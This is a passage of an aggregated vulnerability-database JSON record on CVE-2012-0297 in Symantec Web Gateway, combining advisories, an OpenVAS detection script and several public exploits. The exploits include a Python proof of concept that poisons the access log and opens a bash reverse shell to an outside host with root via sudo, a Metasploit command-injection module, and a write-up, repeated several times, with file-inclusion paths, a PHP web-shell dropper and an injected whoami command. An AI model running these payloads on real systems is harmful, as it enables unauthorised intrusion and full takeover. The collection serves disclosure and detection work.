\"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:0D475EE538584A09C093C3CE051B9477", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:28", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:CA79171627977B6EB496110895555ECA", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:35", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:09723FE34C900B59CB593CFB790946C5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2021-07-28T14:32:17", "description": "**Name**| d2sec_symwebgw \n---|--- \n**CVE**| CVE-2012-0297 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Symantec Web Gateway 5.0.2 Local File Include Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2012-05-21T20:55:00", "title": "DSquare Exploit Pack: D2SEC_SYMWEBGW", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-21T20:55:00", "id": "D2SEC_SYMWEBGW", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_symwebgw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:43", "description": "", "cvss3": {}, "published": "2012-05-26T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-26T00:00:00", "id": "PACKETSTORM:113050", "href": "https://packetstormsecurity.com/files/113050/Symantec-Web-Gateway-5.0.2-Local-File-Inclusion.html", "sourceData": "`#!/usr/bin/python \n \n# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept \n# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. \n# muts at offensive-security dot com \n \n \nimport socket \nimport base64 \n \npayload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' \npayloadencoded=base64.encodestring(payload).replace(\"\\n\",\"\") \ntaint=\"GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\\r\\n\\r\\n\" % payloadencoded \n \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(taint) \nexpl.close() \n \ntrigger=\"GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\\r\\n\\r\\n\" \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(trigger) \nexpl.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113050/symantecwg-lfi.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:12:40", "description": "", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113485", "href": "https://packetstormsecurity.com/files/113485/Symantec-Web-Gateway-5.0.2.8-ipchange.php-Command-Injection.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection\", \n'Description' => %q{ \nThis module exploits a command injection vulnerability found in Symantec Web \nGateway's HTTP service due to the insecure usage of the exec() function. This module \nabuses the spywall/ipchange.php file to execute arbitrary OS commands without \nauthentication. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0297' ], \n[ 'BID', '53444' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x0d\\x0a\\x26\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \n \npost_data = \"subnet=\" \npost_data << \"\\\";\" + payload.raw + \";#\" \n \nprint_status(\"#{peer} - Sending Command injection\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}spywall/ipchange.php\", \n'data' => post_data \n}) \n \n# If the server doesn't return the default redirection, probably \n# something is wrong \nif not res or res.code != 302 or res.headers['Location'] !~ /SW\\/admin_config.php/ \nprint_error(\"#{peer} - Probably command not executed, aborting!\") \nreturn \nend \n \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113485/symantec_web_gateway_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:06", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.28 LFI / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "PACKETSTORM:114231", "href": "https://packetstormsecurity.com/files/114231/Symantec-Web-Gateway-5.0.28-LFI-Code-Execution.html", "sourceData": "`Software: Symantec Web Gateway \nCurrent Software Version: 5.0.2.8 \nProduct homepage: www.symantec.com \nAuthor: S2 Crew [Hungary] \nCVE: CVE-2012-0297, CVE-2012-0298, ??? \n \nFile include: \nhttps://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd \n \nFile include and OS command execution: \nhttp://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd \nYou can execute OS commands just include the error_log: \n/usr/local/apache2/logs/ \n-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log \n-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log \n \nMake a connection to port 80: \n<?php \n$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); \n$cmd = \"<?php system(\\$_GET['cmd']); ?>\"; \nfputs($f,$cmd); \nfclose($f); \nprint \"Shell creation done<br>\"; \n?> \n \nArbitary file download and delete: \nhttps://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog \nd parameter: the complete filename \nAfter the download process application removes the original file with root access! :) \n \nCommand execution methods: \n1.Method \nDownload and delete the /var/www/html/ciu/.htaccess file. \nAfter it you can access the ciu interface on web. \nThere is an upload script: /ciu/uploadFile.php \nUser can control the filename and the upload location: \n$_FILES['uploadFile']; \n$_POST['uploadLocation']; \n \n2.Method \n<form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"file\" name=\"uploadFile\"> \n<input type=\"text\" name=\"action\" value=\"upload\"> \n<input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\"> \n<input type=\"hidden\" name=\"configuration\" value=\"test\"> \n<input type=\"submit\" value=\"upload!\"> \n</form> \n \nThe \"/var/www/html/spywall/cleaner\" is writeable by www-data. \n \nCommand execution after authentication: \n \nhttp://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) \n \nFrom the modified POST message: \nContent-Disposition: form-data; name=\"pingaddress\" \n127.0.0.1`whoami>/tmp/1234.txt` \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/114231/symantecwg-lfiexec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:31", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014\\\u201d >> logging\u201d); \nexec(\u201cecho \\\u201croute >> logging\\\u201d >> networkScript\u201d); \necho \u201cexecuting script`<br/>`\u201d; \nexec(\u201c./networkScript\u201d); \n?> \n`</body>` \n`</html>`\n \n \n Analysis of the command injection\n \n \n\necho \u201cifconfig eth0 netmask \u201c. \\\$HTTP_POST_VARS[\"subnet\"] .\" \". \\\$HTTP_POST_VARS[\u201cip\u201d] .\u201c;\u201d >> networkScript\n \n \n \n\n\u201c;\u201d + payload.encoded + \u201c;#\u201d\n \n \n **/spywall/network.php**\n \n ```php\n <?php\n \n require_once('includes/spywall_api.php');\n /*\n $wan = 'eth0';\n $lan = 'eth1';\n $management = 'eth2';\n $mon = 'eth3';\n $savename = '';\n \n $model = exec('cat /tmp/appliancemodel');\n if ($model == '007' || $model == '009') {\n \t// different ethernet device numbers for these models\n \t$management = 'eth0';\n \t$mon = 'eth3';\n \t$wan = 'eth5';\n \t$lan = 'eth6';\n }\n */\n $portMap = getPortMap();\n $management = $portMap['mgmt'];\n $mon = $portMap['monitor'];\n $wan = $portMap['wan'];\n $lan = $portMap['lan'];\n \n $device = '';\n if ($_POST['name'] == 'lan') {\n \t$device = $lan;\n \t$savename = 'LAN';\n } else if ($_POST['name'] == 'wan') {\n \t$device = $wan;\n \t$savename = 'WAN';\n } else if ($_POST['name'] == 'monitor') {\n \t$device = $mon;\n \t$savename = 'MON';\n } else {\n \t$device = $management;\n \t$savename = 'MAN';\n }\n \n if (strlen($device)) {\n \t// set autonegotiation, duplex (if it isn't set to unknown),\n \t// and speed (if it isn't set to unknown)\n \texec(\"sudo /sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):''));\n \n exec(\"sudo /bin/rm -f /home/admin/autoconfig\". $savename);\n \t// save info to autoconfig file\n \texec(\"echo \\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename);\n //\techo \"\\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .(($_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .(($_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename;\n \tsleep(5);\t// we sleep because otherwise we get back before the changes take effect\n }\n \n ?>\n <script language=\"javascript\"> window.location=\"admin_advanced.php\";</script>\n \n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "attackerkb", "title": "CVE-2012-0297 Symantec Web Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2020-02-13T00:00:00", "id": "AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97", "href": "https://attackerkb.com/topics/cMKWCp2RlE/cve-2012-0297-symantec-web-gateway-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsymantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2012-06-27T00:00:00", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342", "href": "", "sourceData": "Software: Symantec Web Gateway\nCurrent Software Version: 5.0.2.8\nProduct homepage: www.symantec.com\nAuthor: S2 Crew [Hungary]\nCVE: CVE-2012-0297, CVE-2012-0298, ???\n\nFile include:\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\n\nFile include and OS command execution:\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\n You can execute OS commands just include the error_log:\n /usr/local/apache2/logs/\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\n\n Make a connection to port 80:\n <?php\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\n fputs($f,$cmd);\n fclose($f);\n\t\tprint \"Shell creation done<br>\";\n ?>\n\nArbitary file download and delete:\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\n\td parameter: the complete filename \n After the download process application removes the original file with root access! :)\n\n Command execution methods:\n 1.Method\n Download and delete the /var/www/html/ciu/.htaccess file.\n After it you can access the ciu interface on web.\n There is an upload script: /ciu/uploadFile.php\n\tUser can control the filename and the upload location:\n $_FILES['uploadFile'];\n $_POST['uploadLocation'];\n\n 2.Method\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\n <input type=\"file\" name=\"uploadFile\">\n <input type=\"text\" name=\"action\" value=\"upload\">\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\n <input type=\"submit\" value=\"upload!\">\n </form>\n\t\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\n\nCommand execution after authentication:\n\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\n\n From the modified POST message:\n Content-Disposition: form-data; name=\"pingaddress\"\n 127.0.0.1`whoami>/tmp/1234.txt`", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-12T17:30:48", "description": "This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.", "cvss3": {}, "published": "2012-06-01T00:00:00", "type": "openvas", "title": "Symantec Web Gateway Remote Shell Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310802632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802632", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway Remote Shell Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802632\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(53444, 53443);\n script_cve_id(\"CVE-2012-0297\", \"CVE-2012-0299\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-01 12:12:12 +0530 (Fri, 01 Jun 2012)\");\n script_name(\"Symantec Web Gateway Remote Shell Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/18932\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will result in the execution of arbitrary attack supplied\n commands in the context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of certain unspecified\n input. This can be exploited to execute arbitrary code by injecting crafted\n data or including crafted data.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(dir == \"/\") dir = \"\";\nexploit= 'GET ' + dir + '/<?php phpinfo();?> HTTP/1.1\\r\\n\\r\\n';\nres = http_send_recv(port:port, data:exploit);\n\nurl = dir + \"/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log\";\nreq = http_get(item:url, port:port);\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 200\" && \"<title>phpinfo()\" >< res && \"<title>Symantec Web Gateway\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2018-07-03T19:16:51", "description": "", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "symantec web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0298"], "modified": "2014-07-01T00:00:00", "id": "SSV:73332", "href": "https://www.seebug.org/vuldb/ssvid-73332", "sourceData": "\n Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = "<?php system(\\$_GET['cmd']); ?>";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint "Shell creation done<br>";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! :)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on 